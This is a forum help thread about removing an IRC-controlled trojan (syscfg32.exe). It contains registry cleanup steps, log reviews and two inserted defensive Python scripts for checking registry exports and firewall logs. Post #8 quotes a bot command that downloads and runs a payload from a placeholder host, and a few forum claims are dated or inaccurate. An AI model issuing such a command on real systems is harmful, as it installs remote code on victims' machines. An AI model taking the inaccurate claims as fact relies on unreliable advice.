
Thread: Syscfg32.exe trojan??

  1. #1

    Syscfg32.exe trojan??

    Hi, my syscfg32.exe keeps loading up at startup and staying in the background. Could this be some kind of trojan? The file is here, attached, in txt format. I have got AVG virus scanner updated and Spybot, so I dunno why they wouldn't have picked the file up if it was bad?
    Revolution By Definition: The Day Microsoft Falls To A Competitor
    {Attachment removed by mod}



  2. #2
    Join Date
    Aug 2001
    Location
    Stanley NC
    Posts
    3,981
    This is part of a trojan that takes partial control of your PC and then uses it to spoof DNS servers, etc. Delete it from your hard drive and any references in the registry... and uninstall Kazaa. It seems to happen mostly to people who install that spyware-ridden filth of a file sharing program. The trojan is called Backdoor-AHI.

    AND DO NOT PASTE ATTACHMENTS TO FILES that are trojans
    Want my weapons molon labe

  3. #3


    Hi. I had just uninstalled Kazaa with that Kazaa removing program. Does anyone know why my virus scanner or bot scanner didn't pick up this backdoor file syscfg32.exe? That probably explains why my firewall has shown 2649 intrusions, 269 highly serious, since installation a few weeks ago!! It may also explain why I have sometimes received strange syscfg32.exe errors and lots of blue screens. Yoda, how did you find out that file was a backdoor? At the moment syscfg32.exe is still running on my comp and won't show up when I do control alt delete, so I guess it's hidden. I'll have to restart in safe mode and delete the file. I have uninstalled it from my startup list of programs at the moment. It had called itself Configuration Manager in the description bit. I have attached a jpg screenshot of the programs running at startup at the moment. Can you tell me if they are all safe and not backdoors, etc.?
    Also, with my firewall it seems to detect two internet connections!! I have a network card but it has never been connected, so I don't think that it is. I'm still wondering what the other connection thing is!! I included a screenshot of that too.
    Regards,

  4. #4
    soz, here are the attached screenshots

  5. #5
    It seems the screenshot files are too big to attach, so I'll just write the ones I'm unsure of.

    PROGRAM           FILENAME

    LoadPowerprofile  rundll32.exe, pwrprof.dll, loadcurrentpwrscheme (one in Run)
    LoadPowerprofile  rundll32.exe, pwrprof.dll, loadcurrentpwrscheme (one in RunServices)
    LoadQM            loadqm.exe
    Quicktime task    c:\windows\system\qttask.exe -atboottime
    ScanRegistry      c:\windows\scanregw.exe /autorun
    Scheduling agent  mstask.exe
    Systemtray        systray.exe
    taskmonitor       c:\windows\taskmon.exe


    As for the two IPs on my firewall that are being detected as trusted internet servers: 203.173.252.0/255.255.0.0 (which I think is my Ihug ISP), and the other that comes up, which I don't know what it is, is 169.254.0.0/255.255.0.0.

  6. #6
    Join Date
    Aug 2001
    Location
    Stanley NC
    Posts
    3,981
    You need to get rid of this completely, so click Start, and click Run. The Run dialog box appears.
    Type regedit and then click OK. The Registry Editor opens.
    Navigate to the key

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    In the right pane, delete the following value:

    Configuration Loader syscfg32.exe

    Navigate to the following key

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

    In the right pane, delete the value

    Configuration Loader syscfg32.exe

    Exit the Registry Editor.
    This should reverse the changes that the trojan made.
    Make sure you back up the registry first.


    These are usually from IRC channels; make sure you're not connecting using port 6667.


    Those run.dll really shouldn't be running unless you have a program accessing them. Stop everything from running in the background and see what is accessing them. Everything else looks normal? Run a tracert on those ISPs and see who they are.
    Last edited by YODA74; 01-03-2003 at 01:23 PM.
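An added example, not from the thread or from any tool it names: the registry backup YODA74 asks for is a regedit export of the two keys, and this script reads such an export and reports the "Configuration Loader" = syscfg32.exe entries before anything is deleted by hand. The export text is constructed for the example; the value names and the other startup items come from posts #5 and #6.

```python
"""Check an exported copy of the two autostart keys named in post #6 for the
value YODA74 says to delete ("Configuration Loader" -> syscfg32.exe).
Working from a regedit export instead of the live registry means the backup
the post asks for already exists before anything is removed."""
import re

# CONSTRUCTED sample of a Win9x-style regedit export of both keys. The
# syscfg32.exe entries are the ones the thread describes; the other values
# are the legitimate startup items the poster listed in post #5.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"ScanRegistry"="c:\\windows\\scanregw.exe /autorun"
"Configuration Loader"="syscfg32.exe"
"TaskMonitor"="c:\\windows\\taskmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"SchedulingAgent"="mstask.exe"
"Configuration Loader"="syscfg32.exe"
"""

SUSPECT_IMAGES = {"syscfg32.exe"}        # extend with other names as needed
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')  # REG_SZ lines only

def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg file."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # .reg files escape backslash and quote with a leading backslash
            keys[current][m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    return keys

def image_name(data):
    """Bare executable name from a Run-value command line, quoted or not."""
    if data.startswith('"'):
        cmd = data[1:].split('"', 1)[0]
    else:
        cmd = data.split()[0] if data.split() else ""
    return cmd.rsplit("\\", 1)[-1].lower()

def find_autostart_suspects(keys, suspects=SUSPECT_IMAGES):
    """List (key, value_name, data) for Run/RunServices entries launching a suspect image."""
    hits = []
    for key, values in keys.items():
        if not key.lower().endswith(("\\run", "\\runservices")):
            continue
        for name, data in values.items():
            if image_name(data) in suspects:
                hits.append((key, name, data))
    return hits
```

Running it against a real export (regedit, File > Export, with the key selected) lists exactly which values to remove, and the export file itself is what you restore from if a deletion goes wrong.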

  7. #7
    Join Date
    Nov 2000
    Location
    The Mountain State
    Posts
    23,389
    Get HijackThis from the links in my sig and run it, post that log and then run Startup List (Config => Tools => StartupList... in HJT) and post that log too.... If it is not showing up in TaskMan then yes, it is running hidden, and you probably won't find everything connected to it.

    Also you may want to grab one of the anti-trojan scanners; give Trojan Hunter a shot (it has a free trial period).

    169.254.0.0 is a special purpose IP, probably a nameserver.

    Also, zip a copy of the syscfg32 file and PM me, I can probably get it added to Spybot.
    AV, Anti-Trojan List;Browser and Email client List;Popup Killer List;Portable Apps
    “When men yield up the privilege of thinking, the last shadow of liberty quits the horizon.” - Thomas Paine
    Remember: Amateurs built the ark; professionals built the Titantic."

  8. #8
    Daniel, that is a bot used for DDoS. It can be named anything from syscfg32.exe to iexplorer.exe (I'm pretty sure I know which one you have, because that's the default name). It's very, very easy to make it go undetected by the AV. Normally around 14-60kb, depending on whether they packed it with UPX. It's not spyware or something like that, since that bot doesn't have the ability to grant access to your HD, but it does have a download and execute feature, so once your bot is connected to an IRC channel the bot creator just does .netinfo and sees your real IP and then .download http://domian.com/shell.exe and he can install anything he wants.
    Last edited by kriptokool; 01-03-2003 at 07:26 PM.

  9. #9
    Join Date
    Nov 2000
    Location
    The Mountain State
    Posts
    23,389
    Ok, this is very likely related to your problem of last week

    http://www.pcguide.com/vb/showthread...ghlight=Hijack

    Or these from the previous few weeks

    http://www.pcguide.com/vb/showthread...threadid=17585

    http://www.pcguide.com/vb/showthread...threadid=19011

    http://www.pcguide.com/vb/showthread...threadid=19021

    In which you were warned many times that you could possibly be infected with something.

    I asked you several times in those threads to post a log from Startup list or Hijack This, which you haven't done. If you want to get rid of this thing then please be a little more co-operative. Like kriptokool implied, this could be just the tip of the iceberg.

    At this point I would wipe your hard drive (no, not reinstalling, but actually using a program that will write zeros or random data to the entire drive surface, usually several times). Discard any and all floppies that have been created on your machine in at least the last month, any that have not been write protected when inserted into the drive, and all CDs you have burned in the same time period (actually I would go back 1 month before the problems started and get rid of everything up to the present). Then reinstall from factory CDs the OS, and AV. Then change all your passwords, EVERYWHERE; if you have done any online purchases, change all your credit cards, and any banking info. Also, changing your phone number is not a bad idea either.

    In simplest terms...you've been own3d.

  10. #10


    Ok. First of all, my IRC does connect to port 6667. Also, I hadn't made a list of my startup things with HijackThis because I didn't know how to use it. Regarding downloading Trojan Hunter, somebody said just try updating Spybot instead because those programs do the same thing. Included in this post is syscfg32.exe zipped, as MJC requested, and the next reply will contain the startup logs zipped. Regarding bank purchases online, etc., we don't purchase anything on the net. I do check my bank balance on www.anz.com.au, which seems to be highly encryptive and secure, but that is all.

  11. #11
    Here are the other logs, attached. Also I was wondering, can these hackers get through a firewall if my firewall automatically blocks all these kinds of hacker attempts? Also, I'm on dialup and I was wondering how this hacker could repeatedly find my IP address, as it changes every time I dial up again? The other question I had is, if I want to reformat my hard drive big time like mjc said, how could I back up 82 gigs of data that I want to put back on later? Most is mp3 albums.

  12. #12
    I was just wondering too, are there any programs which decrypt the computer language data in exe files, or any files, so it can be read in English?

  13. #13
    Join Date
    Jul 2002
    Location
    Minn
    Posts
    17,373
    Once you let a trojan in, it doesn't have to find you again; it connects with its maker when you log on the web. You have given it permission to be there in some way, like using Kazaa, and it then has full access to your system.

    As for backing up your files.... there are a number of different ways to do so. However, if you do so, you are risking carrying whatever infection you have over to your clean install, thus starting the whole process over again. You may be better off writing off your collection and starting over with good security in place next time.

    Budfred

  14. #14
    Budfred, are you saying if I have opened the trojan I can't block his port attempts? My firewall logs show outgoing attempts to access files syscfg32.exe and something called Microsoft QMgr, both going to almost the same IP, 203.109.250.50:53 and 203.109.250.61:53, which were blocked by my firewall. If the firewall says it blocked these connections, how can they get through? Going back to the actual trojan file, does anyone know if something named Microsoft QMgr is a trojan too? I'm very sure the outcome will be that it is a trojan.

  15. #15
    Join Date
    Aug 2001
    Location
    Stanley NC
    Posts
    3,981
    does anyone know if something named Microsoft QMgr

    Not a trojan as you would think, but it is a daemon responsible for downloading the advertising graphics and copy used by MSN Messenger. I also believe this shows up as "loadqm.exe", which is an application which runs constant checks for updates to MSIE 6 (presumably to help it crash more reliably) and for the MSN IM messenger.


    BUT at this point, given the seriousness of this, I would stop and do what mjc suggested: wipe the drive with a zero-writing program and start all over... This has gone too far and it would be a nightmare to try and fix this now....
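An added example, not from the thread: the outbound entries post #14 describes (syscfg32.exe and QMgr to port 53, the IRC port from post #6, the 169.254.0.0 range from post #5), triaged the way a responder would read a personal-firewall log. The log format and the individual lines are constructed for this example, not ZoneAlarm's real format; only the program names, ports and address ranges come from the posts.

```python
"""Triage outbound personal-firewall entries for the pattern discussed in the
thread: a background process (syscfg32.exe) contacting port 53, and IRC on 6667.
The log lines are CONSTRUCTED in a simple whitespace format for this example."""
import ipaddress
import shlex

SAMPLE_LOG = """\
2003-01-04 23:12:07 OUT syscfg32.exe 203.109.250.50:53 TCP BLOCK
2003-01-04 23:12:09 OUT "Microsoft QMgr" 203.109.250.61:53 TCP BLOCK
2003-01-04 23:13:40 OUT mirc.exe 203.173.252.10:6667 TCP ALLOW
2003-01-04 23:14:02 OUT iexplore.exe 203.173.252.2:80 TCP ALLOW
2003-01-04 23:14:03 OUT iexplore.exe 203.173.252.1:53 UDP ALLOW
2003-01-04 23:15:11 IN - 203.109.250.77:1434 UDP BLOCK
2003-01-04 23:16:00 OUT systray.exe 169.254.12.3:139 TCP ALLOW
"""

LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")   # RFC 3927 auto-config space
IRC_PORTS = {6667}

def parse_line(line):
    """Split one constructed log line into a dict; returns None for junk."""
    parts = shlex.split(line)          # shlex keeps "Microsoft QMgr" as one field
    if len(parts) != 7:
        return None
    date, time, direction, program, dest, proto, action = parts
    host, _, port = dest.rpartition(":")
    return {"when": f"{date} {time}", "dir": direction, "program": program,
            "ip": ipaddress.ip_address(host), "port": int(port),
            "proto": proto, "action": action}

def triage(log_text):
    """Return [(program, 'ip:port', reason)] for entries worth investigating."""
    findings = []
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None or e["dir"] != "OUT":
            continue   # inbound probes are background noise; outbound is the evidence
        dest = f"{e['ip']}:{e['port']}"
        if e["port"] in IRC_PORTS:
            findings.append((e["program"], dest, "IRC port 6667 (posts #6, #8)"))
        elif e["port"] == 53 and e["proto"] == "TCP":
            # Ordinary name lookups are UDP; a program opening its own TCP
            # session on 53 is a common way to disguise controller traffic.
            findings.append((e["program"], dest, "program-initiated TCP on the DNS port"))
        if e["ip"] in LINK_LOCAL:
            # No ISP server lives in 169.254.0.0/16, so a 'trusted server'
            # entry for it is a misconfiguration rather than an upstream host.
            findings.append((e["program"], dest, "link-local destination, not an upstream server"))
        # A BLOCK on an outbound line still proves the program ran and tried to
        # connect: the firewall stopped this attempt, not the infection.
    return findings
```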

  16. #16
    Join Date
    Dec 2000
    Location
    Miles from Civilization.
    Posts
    1,275
    Nightmare....

    Isn't the word for this one. Sir, the approach you are taking is similar to patching a broken back with a band-aid.

    Please take mjc's advice on this one.

    We have all had to bite the bullet once or twice.


    Luck.


    RD.
    It ain't over 'till the Fat Lady sings.....

  17. #17
    Join Date
    Nov 2000
    Location
    The Mountain State
    Posts
    23,389
    At this point those logs look pretty clean, but there is one troublesome line in the hijack log.

    F0-system.ini: Shell=

    That line has been changed; there should be something listed, and if it is explorer, then it wouldn't show up.

  18. #18
    mjc --> what do you mean by "At this point those logs look pretty clean, but there is one troublesome line in the hijack log. F0-system.ini: Shell="?? What does this line mean? Also no-one answered this question before: I was just wondering too, are there any programs which decrypt the computer language data in exe files, or any files, so it can be read in English? What is the best way to back up data? I think I may know someone who can back up data on Jaz drives, etc., so I can back up my mp3s and important documents on them, then wipe everything else.

  19. #19
    MJC - I just looked at my system.ini file. It says shell=explorer.exe

  20. #20
    Does anyone know how to cancel NetBIOS over TCP/IP in network settings? I tried to, but it was all greyed out and I couldn't uncheck the box. Also, MJC, what happens when a person connects to IRC on port 6667? What other port can I use?

  21. #21
    Join Date
    Jan 2001
    Location
    Unimatrix Zero-one
    Posts
    2,273
    decrypt the computer language data in exe files, or any files, so it can be read in english?


    You would need a "disassembler", like w32dasm, that can turn the digital "goobly-gook" of an exe file into assembler code. Also hex editors can pick out text messages embedded in files, if there are any.


    does anyone know how to cancel Netbios over TCP/IP in network settings?


    Disabling "file and print sharing" is all that is needed. Some Windows OSes will still leave the netbios ports open if this is done, but they will not answer netbios calls. (You might be able to hack this in the registry, but I have never seen any reason to go that far.)


    EDIT: I forgot to add that you should also remove "Client for..." if you're not networking your computer with other Windows boxes.


    Hope this helps
    Last edited by Ghost_Hacker; 01-05-2003 at 11:43 AM.
    Ferengi Rules of Acquisition:
    Rule # 47
    Don't trust a man wearing a better suit than your own.

  22. #22
    Join Date
    Nov 2000
    Location
    The Mountain State
    Posts
    23,389
    Then the HijackThis log just dropped the rest of the line, because the way it looked there was no shell.

    And the logs look clean now, so it looks like you got everything, but there is still a chance that passwords and whatnot have been grabbed. You can look at your ZA log and see if it blocked the sysconfig from accessing the internet.

  23. #23
    I looked at my startup list after being connected to the net for 5.5 hours tonight and there were 6 open apps called WinOldAp, which were the file winoa386.mod in c:\windows\system. I'll send you the logs because there's some apps I'm not sure about. Also in my firewall log of tonight there were about 30 UDP port probes from a hacker, using different proxy IPs I think, but no programs such as syscfg32.exe. When I went to update my TheCleaner Active program, according to my logs it connected to what I think was the hacker; also liveupdate.exe and another outgoing connection from ZoneAlarmPro seem to have gone to the hacker too. I don't think Zone Alarm Pro was logging properly, so I clicked full log and I'll send you tomorrow's one.

  24. #24
    Join Date
    Nov 2000
    Location
    The Mountain State
    Posts
    23,389
    Well for that winoldap and winoa386.mod, check this out....

    http://www.computerhope.com/issues/ch000456.htm

  25. #25


    To everyone in this thread: I think the source of my problems I have had for two/three years, which I have posted threads about, are all from this one source. I found thousands of registry entries relating to shells and other malicious hacks in my registry, and since three days ago I've spent 20 hours a day editing and analysing .dll files, hidden files, renamed fake files, and others. MJC said it best: I have been Owned like nothing I have ever seen before. From my knowledge I have discovered hacked virus scanner files (AVG), all hacked anti-trojan scanners: Trojan Hunter, Spybot, Pest Patrol, The Cleaner, Swatit; even my firewall has been hacked. All these anti-trojan things were hacked so that this hacker's registry entries etc. could not be detected or cleaned. All the installation files were hacked too, so if I reinstalled it would do the same. I had my old Windows directory, which was also hacked, so that if I overwrote DLLs from the old dir to the new, nothing would happen. With the somewhat little use that Pest Patrol had, I think it might've picked up things when I analyzed files one by one. By doing that I discovered thousands of 007 Password grabbing files, which were created by the hacker and renamed to hidden fake dlls, exes, dats, and even .sav saved game files. It's unbelievable. I found logs of nearly everything which my computer had done, from opening start menu icons, programs, installing software, bootups, sites I'd been to, deleted files, sent emails, etc. And after all this time spent trying to analyze and edit the files which the hacker hacked, I've learned that this hacker is either very advanced, and the hacking would've taken maybe a year doing the file editing, uploading, registry editing, uploading, which is possible, or he used many .reg files to automatically enter shell data into the registry. I don't know exactly what shells are, but I thought they were something like xdcc bots in mIRC where users can download music and stuff from.
    This makes sense seeing I have approx 62GB of high quality albums of many genres on two hard drives. I guess the hacker initially got through a backdoor of my computer, past the virus scanners, through a file. The question I would like to know is how did he upload the file? I had a few cracks which I'd stupidly downloaded off the internet to make trial version software work, so I guess it could've been from that. My options now: I'm gathering my mp3s into a folder, along with precious work files of my parents, and some txt files, wav files and jpg files which I have edited and analysed their modified dates to make sure they have not been hacked, then I am going to take my computer to a technician friend, store the precious files on there, then totally format my two hard drives. Could the hacker have hacked into my BIOS? Also, can .jpg, .txt, .wav, .mp3 files be hacked? I'm definitely not copying any .dll, .exe, .bat, .com, .sys, or any other file types than I have specified earlier.
    Trust No One
